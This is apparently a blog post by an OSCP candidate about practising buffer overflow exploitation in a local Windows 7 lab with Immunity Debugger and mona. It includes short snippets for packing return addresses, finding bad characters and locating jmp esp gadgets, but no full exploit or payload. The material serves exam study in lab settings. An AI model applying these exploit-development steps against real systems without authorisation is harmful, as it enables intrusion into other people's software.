BoF OSCP Style Study Series

In my studies for OSCP, I found several people who mostly recommend base applications for practicing BoF as being:

• SLmail 5.5;
• Brainpan;
• The TryHackMe Binary with 10 BoF OSCP Style;
• The Binaries of the OSCP laboratory study machine;
• The “storageserver” Binary available in the OSCP laboratory on machine LP07.

The fastest way to start practicing is to set up a local laboratory, basically a Windows 7 machine with vulnerable applications without firewall and antivirus settings and tools to analyze at runtime, so you can avoid the headaches using VPNs or slow VMs from online laboratory services, as most of the apps I named earlier are easy to find and install anywhere.

Setting up the environment

To mount the machine, Microsoft allows you to download a ready-made VM from the link, you just need to do the following:

• Disable Windows updates and Firewall;
• Add fixed IP (Optional).

Microsoft Windows VM Download site.

To install the analysis tools, that is, install Immunity Debugger and mona, we can download Immunity here and mona from GitHub here. The Immunity Debugger will install python2.7 at the end of the installation, so you don’t need to download anything else. The mona is needed to put in the “Pycommands” folder found in the Immunity Debugger installation location. With this we have already created a very functional laboratory environment in a local way.

Download Immunity Debugger

File mona.py on PyCommands folder

Getting vulnerable applications

Some applications are easy to get directly from the manufacturer’s website or exploit-db, but others are not. To obtain the “storageserver” it is necessary to have access to the OSCP laboratory’s VPN or ask a colleague who has access to download and share, the same goes for the binaries of the OSCP laboratory’s study machine, so it is highly recommended to take advantage of it the time of the OSCP laboratory VPN and downloading all these applications, which are just there to be downloaded by students; For the TryHackMe binary, I recommend creating the SLmail 5.5 exploit locally, then accessing the TryHackMe VPN, connecting the VM from the BoF series at this link, installing the SLmail that is in the VM, exploiting the service and exfiltrating the OSCP.exe binary and your DLL.

Vulnerable applications.

BoF information and technical guides

I really like S4vitar’s tips, he’s a Spanish hacker, I think it’s not too difficult to understand his explanation of BoF, besides being documented in this link (along with all his general OSCP tips), you can also watch the step-by-step video from setting up the environment to obtaining a system with the exploit created for BoF.

The BoF TryHackMe Series itself is at this link, it also has the BoF explanation step by step, it seems to me very well explained the whole procedure in “task 2”, where it details the operation of the binary I mentioned before and explores it without detailing information and Buffer values or return addresses, which are the questions of the activity and the student must find.

The Penetration Tester M0chan has a well explained and technically detailed guide here, as well as some examples of vulnerable applications.

Finally, the OSCP material itself is quite complete in address the subject of BoF and details the exploration step by step.

Extras

As an extra, it’s good to mention some important commands to use when creating the BoF exploit.

To convert the return address and be able to add it directly to our buffer, it’s a good idea to use the following lines in python:

• from struct import *#add in import section
• addr_return = pack('<L',0x000000) # exchange the 000000 for the return address found

With the previous two lines, it is no longer necessary to write the address backwards and add “\x” to each value.

Using struck and pack for return address.

When looking for badchars, many prefer to do the manual process and nothing against it, but I recommend doing a check using mona in the end, for that, we use the following commands:

• !mona config -set workingfolder C:\Users\meuUser\Desktop\%p #create mona working directory
• !mona bytearray -b "\x00" #create the badchars array already removing the found badchars
• !mona compare -f C:\Users\meuUser\Desktop\appName\bytearray.bin -a ADDR #compare the results and check that there are no more badchars

First we create mona’s working directory, in which the badchar array is generated by mona and with which it makes comparisons, it is important to note that in the third command the value ADDR is the address value of the first character of the array of badchars . For more details, this link has a more complete explanation and the TryHackMe series also covers this subject.

Create the badchars array with mona.

Compare the badchars array with mona.

Finally, when looking for the return address, mona can again give you a little help with the following command:

• !mona jmp -r esp -cpb "\x00\x07"

With the previous command, mona already looks for a jmp esp call that doesn’t have the badchars informed in the return address.

Looking for return address with mona.

Finally, I know that it depends on the applications to be studied, some extra settings must be done, but as the goal was to create a basic, fast and useful environment to focus on studies for the OSCP exam, I didn’t feel the need for more advanced settings , because the configurations here fulfill satisfactorily with this objective.

I would like to thank Microsoft for making the VMs available for free, the folks at TryHackMe for creating the BoF Series, and S4avitar for sharing their experiences with the OSCP exam.